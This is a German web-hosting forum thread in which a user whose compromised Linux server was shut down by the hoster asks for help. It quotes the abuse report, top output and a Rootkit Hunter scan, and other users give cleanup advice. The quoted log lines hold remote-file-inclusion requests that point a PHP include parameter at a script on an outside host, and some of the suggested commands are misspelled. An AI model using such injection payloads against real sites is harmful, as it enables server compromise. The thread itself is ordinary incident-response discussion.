CPU Auslastung

[911fun]

Hallo Zusammen,

ich habe eine dringende Anfrage und hoffe, dass ihr mir hierbei irgendwie weiterhelfen koennt.

Ich habe den folgenden Server gemietet:
http://www.hosteurope.de/produkt/Virtua ... r-Linux-XL

Neulich habe ich eine eMail vom Hoster erhalten:

Sehr geehrte Damen und Herren,

wir haben eine Beschwerde erhalten, da Ihr Server anscheinend Daten an Server Dritter sendet, die sich dadurch gestört fühlen (Portscans, Bruteforce-Attacken, Kompromittierungsversuche o.ä.) bzw. die Stabilität unseres Netzes beeinträchtigen. Die uns vorliegenden Daten sind unten angegeben.

In den meisten Fällen entstehen solche Probleme durch unsichere
PHP-Skripte und CGIs. Oft reicht es aus, die eingeschleusten
Applikationen (nach Erstellung einer Kopie!) zu entfernen und die unsicheren Skripte zu löschen oder abzusichern. Sie sollten also zunächst Ihr System nach Schwachstellen durchsuchen und herausfinden, auf welchem Wege schädliche Skripte eingeschleust wurden.

Manchmal tritt dieses Phänomen auch auf, wenn Ihr Rechnern von Angreifern übernommen (vulgo: "gehackt") und root/Administrator-Zugang erlangt wurde. Dies ist z.B. möglich, wenn Sicherheitslücken in Diensten bestehen, die nicht durch Updates behoben wurden.

Der Server wurde aufgrund der beschriebenen Aktivitäten von uns heruntergefahren.

Sie können das System allerdings selbst jederzeit wieder starten, um sich des Problems anzunehmen. Bei Virtual Servern ist dies über das VZPP, bei anderen Servern über das Remote Management oder einen Reboot-Auftrag möglich.

Bitte antworten Sie so bald wie möglich auf diese E-Mail, wenn Sie das Problem selbstständig beheben oder anderweitig klären konnten. Bitte antworten Sie auf diese Anfrage per E-Mail, da unser Telefonsupport Ihnen keine weiteren Auskünfte geben kann.

Wir bitten IN JEDEM Fall um eine RÜCKMELDUNG!!


Wenn wir keine Rückmeldung von Ihnen erhalten, der Server aber trotzdem wieder gestartet wird, sind wir bei Anhalten des Problems gezwungen, den Server (auch zu Ihrer Sicherheit) bis zu einer Reaktion durch Sie vom Netz zu nehmen.


> Greetings:
>
> IP Address of attacker: 92.51.134.76
>
> Type of attack: URL Injection -- attempt to inject / load files onto the
> server via PHP/CGI vulnerabilities
>
> Sample log report including date and time stamp (1st field is "request", 2nd
> field is the IP address or the domain name being attacked, and the 3rd field
> is the IP address or domain name of the attacker):
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:35 -0400]
> "GET
> /amp-3.2/includes/base.php?base_path=http://www.sangabuay.com/p/info.txt???
> HTTP/1.1" 500 546 "-" "libwww-perl/5.806" - "-"
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:36 -0400]
> "GET
> /frameset%20pages/store/accessories/amp-3.2/includes/base.php?base_path=http
> ://www.sangabuay.com/p/info.txt??? HTTP/1.1" 500 546 "-" "libwww-perl/5.806"
> - "-"
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:37 -0400]
> "GET
> /frameset%20pages/store/accessories/nuheat_prices.html/amp-3.2/includes/base
> .php?base_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 500 546 "-"
> "libwww-perl/5.806" - "-"
>
> NOTES:
>
> URL Injection attacks typically mean the server for which the IP address of
> the attacker is bound is a compromised server.
>
> Please check the server behind the IP address above for suspicious files in
> /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
> /var/spool/squid, and /var/spool/cron Please use "ls -lab" for checking
> directories as sometimes compromised servers will have hidden files that a
> regular "ls" will not show.
>
> Please also check the process tree (ps -efl or ps -auwx) for suspicious
> processes; often times the malware / hack pretends to be an Apache process.
>
> Clam Anti-virus, clamscan, can also be used to find commonly used PHP and
> Perl-based hacks, including various php shells, on a server using the
> "--infected" and "--recursive" options.
>
> You may also want to check out using root kit detection tools -
> http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://
> http://www.ossec.net/en/rootcheck.html as tools which should be used in
> addition to checking the directories and process tree.
>
> ### EOF NOTES ###
>
> Please take appropriate action to stop these attacks from happening.
>
> Thank you very much for your time.

Meine CPU Last schwankt seitdem in regelmaessigen Abstaenden und ist zur Zeit wieder bei
70% geht langsam wieder runter.


Wer kann mir hier ein paar Tips geben, wie vorzugehen ist...

Danke fuer Eure Hilfe!

[elexis]

Als erstes solltest Du herausfinden, welcher Dienst den Load verursacht.

Wenn Du das weisst, kannst Du anhand der Logs herausfinden woher der Load komnmt:

Code:

top

Code:

ps fax

Code:

ps aux

Code:

cd /var/log/

Code:

grep -R 'ZB. Zeit' *

Melde Dich wenn Du mehr infos hast.

Grüsse

Sascha

[elexis]

Als erstes machst du eine Konsole auf und gibst den Befehl "top" ein. Dann siehst Du immer zuoberst den Prozess, der den Load verursacht.

1) Herausfinden, welcher dienst Deinen Load hochtreibt.

Dann wenn Du weisst, welcher Prozess es ist, kannst du anhand der Logs herausfinden, wie du dagegen vorgehen kannst. Meist sind das Hacker, die einen Script hochgeladen haben und irgendwas anstellen.


Wenn Du diese Infos hast melde Dich.

Grüsse

Sascha

[911fun]

Hallo Sascha,

Gerade ist die CPU Auslastung wieder sehr hoch.

Hier ist das 'top' Ergebnis:

5935 wwwrun 16 0 43452 20m 4604 S 4 0.3 0:00.72 httpd2-prefork
1690 wwwrun 16 0 0 0 0 Z 4 0.0 0:00.14 perl <defunct>
1698 wwwrun 16 0 0 0 0 R 4 0.0 0:00.14 perl
1704 wwwrun 16 0 0 0 0 Z 4 0.0 0:00.14 perl <defunct>
1683 wwwrun 21 0 0 0 0 Z 4 0.0 0:00.13 perl <defunct>
1684 wwwrun 16 0 0 0 0 Z 4 0.0 0:00.13 perl <defunct>
1688 wwwrun 16 0 0 0 0 Z 4 0.0 0:00.13 perl <defunct>
1691 wwwrun 16 0 0 0 0 R 4 0.0 0:00.13 perl
1696 wwwrun 20 0 0 0 0 Z 4 0.0 0:00.13 perl <defunct>
1697 wwwrun 22 0 0 0 0 Z 4 0.0 0:00.13 perl <defunct>
1699 wwwrun 16 0 12780 10m 1720 R 4 0.1 0:00.13 perl
1659 wwwrun 16 0 0 0 0 Z 4 0.0 0:00.14 perl <defunct>
1666 wwwrun 16 0 12756 10m 1720 R 4 0.1 0:00.12 perl
1689 wwwrun 16 0 12568 10m 1688 S 4 0.1 0:00.12 perl
1663 wwwrun 16 0 0 0 0 Z 3 0.0 0:00.13 perl <defunct>
1665 wwwrun 16 0 12700 10m 1700 R 3 0.1 0:00.12 perl
1680 wwwrun 17 0 0 0 0 Z 3 0.0 0:00.13 perl <defunct>
1718 wwwrun 16 0 12576 10m 1688 S 3 0.1 0:00.11 perl
1660 wwwrun 16 0 0 0 0 Z 3 0.0 0:00.13 perl <defunct>
1678 wwwrun 16 0 0 0 0 Z 3 0.0 0:00.13 perl <defunct>
1681 wwwrun 17 0 12200 10m 1680 R 3 0.1 0:00.10 perl
1685 wwwrun 22 0 12068 9.9m 1680 R 3 0.1 0:00.09 perl


Danke
Andre

[911fun]

Habe mal einen System Scan gemacht...
Wird einer schlau daraus?

Warning: Scanning completed at May 2, 2009 12:16 AM. Considerable existing/potential security problems were detected in the system. For details, see the log below.
Scanning Log:

[ Rootkit Hunter version 1.3.4 ]

Checking rkhunter data files...
Checking file mirrors.dat [ No update ]
Checking file programs_bad.dat [ No update ]
Checking file backdoorports.dat [ No update ]
Checking file suspscan.dat [ No update ]
Checking file i18n/cn [ No update ]
Checking file i18n/de [ Updated ]
Checking file i18n/en [ No update ]
Checking file i18n/zh [ No update ]
Checking file i18n/zh.utf8 [ No update ]
[ Rootkit Hunter version 1.3.4 ]

Checking system commands...

Performing 'strings' command checks
Checking 'strings' command [ OK ]

Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]

Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/fgrep [ OK ]
/bin/fuser [ OK ]
/bin/grep [ OK ]
/bin/ip [ OK ]
/bin/kill [ OK ]
/bin/logger [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/lsmod [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/basename [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/chroot [ OK ]
/usr/bin/csh [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/ed [ OK ]
/usr/bin/egrep [ OK ]
/usr/bin/env [ OK ]
/usr/bin/fgrep [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/grep [ OK ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lsof [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/mail [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/sed [ OK ]
/usr/bin/sh [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/sort [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/touch [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ OK ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/usr/bin/tcsh [ OK ]
/usr/bin/mailx [ OK ]
/sbin/checkproc [ OK ]
/sbin/chkconfig [ Warning ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ OK ]
/sbin/ifstatus [ OK ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/cron [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]

[Press <ENTER> to continue]

Checking for rootkits...

Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
Fuck`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
IntoXonia-NG Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Phalanx2 Rootkit [ Not found ]
Phalanx2 Rootkit (extended tests) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
Vampire Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]

Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]

Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]

Performing trojan specific checks
Checking for enabled xinetd services [ Warning ]

Performing Linux specific checks
Checking loaded kernel modules [ Warning ]
Checking kernel module names [ Skipped ]

[Press <ENTER> to continue]

Checking the network...

Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]

Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]

[Press <ENTER> to continue]

Checking the local host...

Performing system boot checks
Checking for local host name [ Found ]
Checking for system startup files [ Found ]
Checking system startup files for malware [ None found ]

Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ Warning ]
Checking for group file changes [ Warning ]
Checking root account shell history files [ OK ]

Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Not set ]
Checking if SSH protocol v1 is allowed [ Not allowed ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]

Performing filesystem checks
Checking /dev for suspicious file types [ Warning ]
Checking for hidden files and directories [ None found ]

[Press <ENTER> to continue]

Checking application versions...

Checking version of GnuPG [ OK ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ OK ]
Checking version of PHP [ OK ]
Checking version of ProFTPd [ OK ]
Checking version of OpenSSH [ OK ]


System checks summary
=====================

File properties checks...
Required commands check failed
Files checked: 135
Suspect files: 4

Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0

Applications checks...
Applications checked: 6
Suspect applications: 0

The system checks took: 2 minutes and 58 seconds

All results have been written to the logfile (/var/log/rkhunter.log)

One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter.log)

[elexis]

Bei dir werden perl Scripts ausgeführt !!! Das sieht nach einem Hacker aus, hatte schon das selbe vor ca. 1 Jahr.

Stop den Apache und kille die perl Prozesse. Dann beobachte ob trotz apache stop die Perl Skripte wieder auftauchen, wenn ja prüfe Deine CroneJobs.

Code:

kill all perl

schaue in deinen CronJobs, da war bei mir ein script, der den PerlScript automatisdch startet.

Code:

cronetab -e

Dann finde über das httpd log unter:

Code:

tail -f /var/log/httpd/error_log

und

Code:

tail -f /var/log/httpd/accsess_log

heraus, von welcher Domain das kommt.

Bei mir war es ein Script, der ein Perlsocket aufgemacht hat.

Grüsschen mal vorab :-)

Sascha

(Prüfe dein /tmp)

Evtl. kannst Du apache nicht neu starten, es kommt eine fehlermeldung, dann weil der Perlskript den Port 80 noch belegt. Dies kannst Du so fixen:

Code:

fuser -n tcp 80

Code:

kill -9 PIDdesDienstas

Dann kannst Du Apache wieder starten

Code:

lsof -p $PID

Code:

grep perl access_log